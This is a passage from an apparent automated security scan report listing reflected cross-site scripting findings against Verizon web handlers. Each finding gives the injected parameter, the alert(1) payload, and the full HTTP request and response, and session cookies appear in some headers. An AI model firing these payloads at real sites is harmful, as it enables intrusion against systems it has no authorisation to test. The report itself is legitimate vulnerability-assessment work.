<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/190025298/266847915/direct/01" onclick="(new Image).src='http://r1.ace.advertising.com/click/site=0000782102/mnum=0000928240/cstr=65895854=_4ce92cd5,4766470702,782102^928240^1183^0,1_/xsxdata=$XSXDATA/bnum=65895854/optn=64?trg=&7072a"><script>alert(1)</script>ce96f4563f2=1http://t.redcated'">
...[SNIP]...

2.758. http://wapp.verizon.net/bookmarks/bmredirex.asp [WT.ti parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The value of the WT.ti request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c748"%3balert(1)//a814480360d was submitted in the WT.ti parameter. This input was echoed as 9c748";alert(1)//a814480360d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout9c748"%3balert(1)//a814480360d HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 152
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:48:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:48:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=T2NHMnySvcZpqX6wZM4gwP0QdlsfW8NSqTwB5vsX8vvGTd9mcWpV!133454377; path=/


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkout9c748";alert(1)//a814480360d";
</script>

2.759. http://wapp.verizon.net/bookmarks/bmredirex.asp [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e80cd"%3balert(1)//130ab0744e1 was submitted in the channel parameter. This input was echoed as e80cd";alert(1)//130ab0744e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=goo_search&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmre80cd"%3balert(1)//130ab0744e1 HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:09:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:09:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=2yWNMntR2VP6ScZhsjs316DnrdJyKR4tNT4KFC3Tlgw3M6qTrYxC!-16130884; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmre80cd";alert(1)//130ab0744e1";
</script>

2.760. http://wapp.verizon.net/bookmarks/bmredirex.asp [clientid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The value of the clientid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee502"%3balert(1)//be7a3cddcbe was submitted in the clientid parameter. This input was echoed as ee502";alert(1)//be7a3cddcbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=goo_search&q='&web_search_type=basic&clientid=cnsmree502"%3balert(1)//be7a3cddcbe&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:09:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:09:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=49hPMnthQRfmJYvnpJ7YLhQRMxK64N2vwmLvCfHFQqf4VKnbKGQy!-552517484; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmree502";alert(1)//be7a3cddcbe&channel=Nwcnsmr";
</script>

2.761. http://wapp.verizon.net/bookmarks/bmredirex.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f54c1"%3balert(1)//67e8173d08d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f54c1";alert(1)//67e8173d08d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout&f54c1"%3balert(1)//67e8173d08d=1 HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 155
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:48:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:48:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=6WMRMnpLcT21tTHQ614mJtX0tcZp14FT8s1Ly11BB1kNqpGpDK6m!-552517484; path=/


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkout&f54c1";alert(1)//67e8173d08d=1";
</script>

2.762. http://wapp.verizon.net/bookmarks/bmredirex.asp [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8b66"%3balert(1)//b6c880b93f7 was submitted in the q parameter. This input was echoed as f8b66";alert(1)//b6c880b93f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=goo_search&q='f8b66"%3balert(1)//b6c880b93f7&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:08:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:08:45 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=QkFsMntNGTxpwFvTMLpddppD4hwQGbGJ0JMQcgH9Hm6mpLK12BHl!-16130884; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='f8b66";alert(1)//b6c880b93f7&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr";
</script>

2.763. http://wapp.verizon.net/bookmarks/bmredirex.asp [web_search_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The value of the web_search_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8b1d"%3balert(1)//54879207f6a was submitted in the web_search_type parameter. This input was echoed as d8b1d";alert(1)//54879207f6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=goo_search&q='&web_search_type=basicd8b1d"%3balert(1)//54879207f6a&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 02:09:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:09:08 GMT
Connection: close
Set-Cookie: VZCSESSIONID=3Z6JMntGTjQnpj89SqNJNCqKqk8Q965Xg3t45VjvdyLRx1npqRNk!-552517484; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basicd8b1d";alert(1)//54879207f6a&clientid=cnsmr&channel=Nwcnsmr";
</script>

2.764. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [WT.ti parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The value of the WT.ti request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26041"%3balert(1)//db67067f088 was submitted in the WT.ti parameter. This input was echoed as 26041";alert(1)//db67067f088 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout26041"%3balert(1)//db67067f088 HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 152
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:48:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:48:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=tJRbMnyY3CbLSg6h2jR6dxjvj3LwGxBkZF7LyXnM5TCF48L4p6G4!-1123586183; path=/


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkout26041";alert(1)//db67067f088";
</script>

2.765. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3e18"%3balert(1)//1ba31d2c96 was submitted in the channel parameter. This input was echoed as c3e18";alert(1)//1ba31d2c96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmrc3e18"%3balert(1)//1ba31d2c96 HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 220
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:08:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:08:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=N0LMMntDQ3RpWt1Ch6H3NPdJYM9gz6cJ23S2zTrpNkZFPldZyDTL!-732060938; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmrc3e18";alert(1)//1ba31d2c96";
</script>

2.766. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [clientid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The value of the clientid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28952"%3balert(1)//a64a12a87fe was submitted in the clientid parameter. This input was echoed as 28952";alert(1)//a64a12a87fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='&web_search_type=basic&clientid=cnsmr28952"%3balert(1)//a64a12a87fe&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:07:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=Sy2TMntffpm2wv5r2R1yT69GzhdMh6QTMyJDyYQztYdx8gR8vbmG!396615442; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmr28952";alert(1)//a64a12a87fe&channel=Nwcnsmr";
</script>

2.767. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17699"%3balert(1)//ab8a8ea1a80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17699";alert(1)//ab8a8ea1a80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout&17699"%3balert(1)//ab8a8ea1a80=1 HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 155
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:48:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:48:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=7g52MnyYqTy13KL31X5pnlsmbPLtrhtyjyP8rXxwQ66gzGgkcvRT!133454377; path=/


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkout&17699";alert(1)//ab8a8ea1a80=1";
</script>

2.768. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e720"%3balert(1)//81de72d4a66 was submitted in the q parameter. This input was echoed as 4e720";alert(1)//81de72d4a66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='4e720"%3balert(1)//81de72d4a66&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:07:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:57 GMT
Connection: close
Vary: Accept-Encoding
